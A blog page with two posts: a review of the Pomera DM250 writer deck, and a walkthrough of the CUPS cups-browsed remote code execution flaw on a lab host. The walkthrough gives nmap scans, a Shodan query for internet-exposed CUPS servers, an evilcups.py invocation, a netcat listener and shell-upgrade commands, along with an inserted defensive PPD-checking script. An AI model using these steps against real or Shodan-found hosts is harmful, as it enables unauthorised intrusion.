Thursday, October 10, 2024

Exploring the World of Writer Decks

What is a Writer Deck?

Today, we’re diving into a fascinating, fast-growing niche in the tech world: Writer Decks. The best definition of these unique devices comes directly from the passionate r/writerDeck community itself:

“Single-purpose, distraction-free writing devices of all types—DIY and mass-produced. Basically, cyberDecks built specifically for writing, such as the Alphasmart Neo or Astrohaus Freewrite (or the O.G., typewriters). Discuss your favorites, show off your builds, whatever!”

In a world completely saturated by digital noise, having a device dedicated purely to the written word feels like the ultimate productivity hack. There’s something incredibly freeing about focusing on a single task without the temptation of incoming notifications, social media pings, or endless browser tabs. It pulls you out of a passive scroll and makes the act of writing feel intentional, rhythmic, and even meditative.

The Encounter

My first real encounter with a writer deck came from a video by productivity creator James Scholz titled “Tech I Use to Stay Productive!” Around nine minutes in, he showcased a device that immediately stopped me in my tracks: a "Pomera" writer deck, specifically the King Jim Pomera DM250 Digital Memo.

I was instantly captivated. Scholz described how utilizing a dedicated tool like this enhances his journaling process, adding a layer of deliberate romanticism to daily writing that I hadn’t really considered before. No desktop distractions, no blue-light sensory overload—just a purpose-built tool for words. I loved everything about the concept.

Having followed James Scholz for years, I’ve always been intrigued by his deep appreciation for quirky, retro-inspired hardware. His choice of the DM250 sparked my curiosity, and soon enough, I was down a rabbit hole researching everything about it.

The specific model he showcased was the incredibly rare, limited-edition Pomera DM250 "Crystal"—a transparent, see-through chassis that channels a perfect nostalgic, cyberpunk aesthetic. True to form for Scholz's unique finds, it's a legendary collector's piece.

Navigating the Market

Fired up by the video, I immediately headed to eBay to check out the price range for the DM250.

 

To my shock, a recent listing for a mint condition model was sitting at over $1,000! While I’d initially been dead-set on hunting down that beautiful transparent Crystal edition, its sheer exclusivity and skyrocketing collector price quickly snapped me back to reality. I pivoted my search toward the standard, dark gray Pomera DM250 instead.

Interestingly, these simple, hyper-focused devices command an incredibly high resale value. At the time of my search, global availability was sparse, with roughly 97 units listed worldwide—almost all located natively in Japan. Buying one means factoring in international shipping and import taxes.

The Game Changer: The Official US Release

Just as I was resigned to dealing with international proxy shipping and an entirely Japanese keyboard layout, I discovered some massive news for the writer deck community. King Jim officially launched a localized Western version: the Pomera DM250US.

Initially debuting via a crowdfunding campaign, it is now available directly through King Jim’s US storefront.

At a retail price of $499, it is a steep investment for a text-only machine—placing it right in competition with premium alternatives like the Astrohaus Freewrite Traveler. However, for a lot of writers, the quality-of-life upgrades make it worth the price premium over a Japanese import:

  • Native US Layout: No more hunting for punctuation or dealing with a cramped, shifted spacebar designed for Japanese input.

  • English Firmware & Features: The software is fully localized, complete with live English word counts, split-screen document comparison, and an active spell-check (which highlights typos with a nice pop of color on the LCD screen).

  • Worry-Free Shipping: It ships natively, bypassing the gamble of surprise import taxes and customs delays.

 

I hope you found this deep dive into the world of writer decks as intriguing as I did! For more examples and discussion on these devices, check out the r/writerDeck community.

And lastly, a huge thanks to James Scholz, whose content has inspired my interest in this niche tech for years.

Tuesday, October 1, 2024

Attacking UNIX systems via CUPS

CUPS is a modular printing system for Unix-like operating systems that allows a computer to act as a print server. The vulnerability covered in this post was discovered by Evilsocket (Simone Margaritelli).

https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8 

... 

PoC: RCE

Let’s assume our target host is 10.10.11.40. We can conduct enumeration using Nmap with the following command: 

sudo nmap -sC -sV -vv -oA nmap/evilcups 10.10.11.40

This command runs Nmap's default scripts (-sC) and service version detection (-sV) with increased verbosity (-vv). The -oA nmap/evilcups option saves the scan results in all three output formats (normal, XML and grepable) under the base name "nmap/evilcups".

...

The scan reveals a Debian machine with port 22 open, along with the Internet Printing Protocol (IPP) listening on port 631, indicating it is running CUPS 2.4. A web server is hosted on this interface, displaying the title "Home – CUPS 2.4.2." We can access it at http://10.10.11.40 in our browsers.

... 

As we can see, the default CUPS management interface is exposed.

[!] Note that it is effortless to search for instances where this interface is exposed on the open web. This can be done by heading to Shodan and searching:

  port:631 "CUPS"

Using an IP address from the results in Shodan, such as x.x.x.x:631, we can successfully bring up the CUPS management interface for these targets. 

Let's pivot back to our PoC for now. Currently, we are accessing this instance as an “anonymous user.” While we lack administrative privileges, we can still view the printers.  

... 

Actions that we can conduct from here include viewing the jobs associated with this printer and printing a test page. Note that we cannot delete or modify printers at this time, as we are not an administrator. 

The next step is to run the command: 

sudo nmap -sU -p 631,632 10.10.11.40  

This command instructs nmap to perform a UDP scan on the target host. It is specifically checking ports 631 and 632. Here is the result: 

... 

Note that Evilsocket has detailed the main CVEs associated with this vulnerability here. 

... 

Also, we can view the reported vulnerability on GitHub. 

... 

Another version of this code has been made available to us by IppSec:

https://github.com/ippsec/evil-cups

IppSec has made a few improvements to this PoC, and as such, I will be talking about this script. It can be run with:

python evilcups.py [my host IP] [target host IP]

Let’s dig into that script a bit:

... 

This function is responsible for sending our UDP packet to our target host. In this script we are sending our specified attributes.

An interesting part of this script is:

... 

This line begins with a single quote. This results in a blank variable being inserted during our request. To get a better understanding of our packet we can visit Apple.com

... 

After “evilcups.py” is executed, when we refresh the CUPS interface from earlier (http://10.10.11.40), we can see that we have added a new printer under the name we specified ("HACKED"): 

... 

To catch the reverse shell, start a listener with: nc -lvnp 9001. Here we use netcat to listen on port 9001. Next, click into this newly added printer and print a test page. Doing this triggers the “FoomaticRIPCommandLine” section of IppSec's code, consequently spawning a shell.

... 

Upgrading the shell is done with:

python -c 'import pty;pty.spawn("/bin/bash")'

Note that this command creates a bash shell session where a standard shell might not be available, e.g. a remote access session like this one.

After that, we can execute the command:

stty raw -echo; fg

This command sets the terminal to 'raw' mode, turns off local echo, and brings the background job to the foreground. At this point, a reverse shell as the "lp" user is established.
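A defensive check for the test-page step above, as an added example that is not part of the original post or of IppSec's script: it scans PPD text for FoomaticRIPCommandLine values that run anything other than an expected renderer. The allowlist, the name audit_ppd and both sample PPDs are assumptions constructed for illustration.

```python
import re

# Assumed allowlist of renderer binaries a Foomatic driver normally calls;
# tune it to the drivers actually installed on the print server.
EXPECTED_BINARIES = {"gs", "cat", "pnmtops", "hpijs"}
# *FoomaticRIPCommandLine (optional space before the colon) and its quoted
# value, which may span several lines in a PPD.
DIRECTIVE = re.compile(r'^\*FoomaticRIPCommandLine\s*:\s*"([^"]*)"', re.M)
SUBSTITUTION = re.compile(r"\$\(|`|/dev/(tcp|udp)/")

# Constructed sample: a driver-style entry using Foomatic's "&&" line split.
BENIGN_PPD = '''*cupsFilter: "application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dPARANOIDSAFER -dNOPA&&
USE -sDEVICE=ijs -sOutputFile=- - | hpijs"
*End
'''
# Constructed sample: an entry whose command is not a renderer at all.
SUSPECT_PPD = '''*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine : "touch /tmp/constructed-marker"
'''

def audit_ppd(ppd_text):
    """Return (command, reasons) for each suspicious FoomaticRIPCommandLine."""
    findings = []
    for match in DIRECTIVE.finditer(ppd_text):
        # Undo Foomatic's "&&<newline>" continuation, then normalise spaces.
        command = " ".join(match.group(1).replace("&&\n", "").split())
        reasons = []
        if SUBSTITUTION.search(command):
            reasons.append("shell substitution or /dev/tcp redirection")
        # Every stage of the command line should start with a known renderer.
        for stage in re.split(r"\|\||&&|[|;&]", command):
            words = stage.split()
            if words and words[0].rsplit("/", 1)[-1] not in EXPECTED_BINARIES:
                reasons.append("unexpected binary: " + words[0])
        if reasons:
            findings.append((command, reasons))
    return findings

if __name__ == "__main__":
    for name, text in (("benign", BENIGN_PPD), ("suspect", SUSPECT_PPD)):
        print(name, audit_ppd(text))
```

CUPS stores each queue's PPD under /etc/cups/ppd/, so running audit_ppd over those files after an unexpected printer appears shows what printing a test page on it would execute.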

The "Fix"

We can head to the cups-browsed Git repo and see the change brought in as a result of this vulnerability.

https://github.com/OpenPrinting/cups-browsed/commit/1debe6b140c37e0aa928559add4abcc95ce54aa2

... 

Closing

Something I found interesting was how turbulent the reporting process was for Evilsocket. They go into more detail about it in their blog, but essentially, this issue was quite difficult to report despite being so dangerous. Furthermore, he explains that his initial report of this finding was leaked!

Thank You

I want to thank you for reading this article, IppSec for the wonderful documentation, and Evilsocket (Simone Margaritelli) for sharing their findings surrounding this vulnerability!

https://www.evilsocket.net/
https://www.linkedin.com/in/ippsec/
